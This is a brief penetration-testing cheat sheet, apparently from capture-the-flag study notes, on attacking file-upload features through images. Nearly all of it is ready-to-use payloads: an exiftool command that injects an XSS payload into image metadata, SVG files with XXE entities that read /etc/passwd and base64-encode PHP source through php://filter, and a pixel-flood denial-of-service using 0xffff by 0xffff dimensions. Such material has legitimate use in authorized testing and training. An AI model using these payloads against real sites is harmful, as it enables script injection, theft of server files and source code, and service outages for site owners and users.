XSS

Sometimes sites are displaying metas of the image, we could exploit with:

exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg

XXE

With SVG Images

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

Or with encoding and php filters:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>

DOS

When uploading a JPG or PNG image we can do a Pixel Flood attack, setting a dimension of 0xffff * 0xffff.

The server will then load an image of 4GB.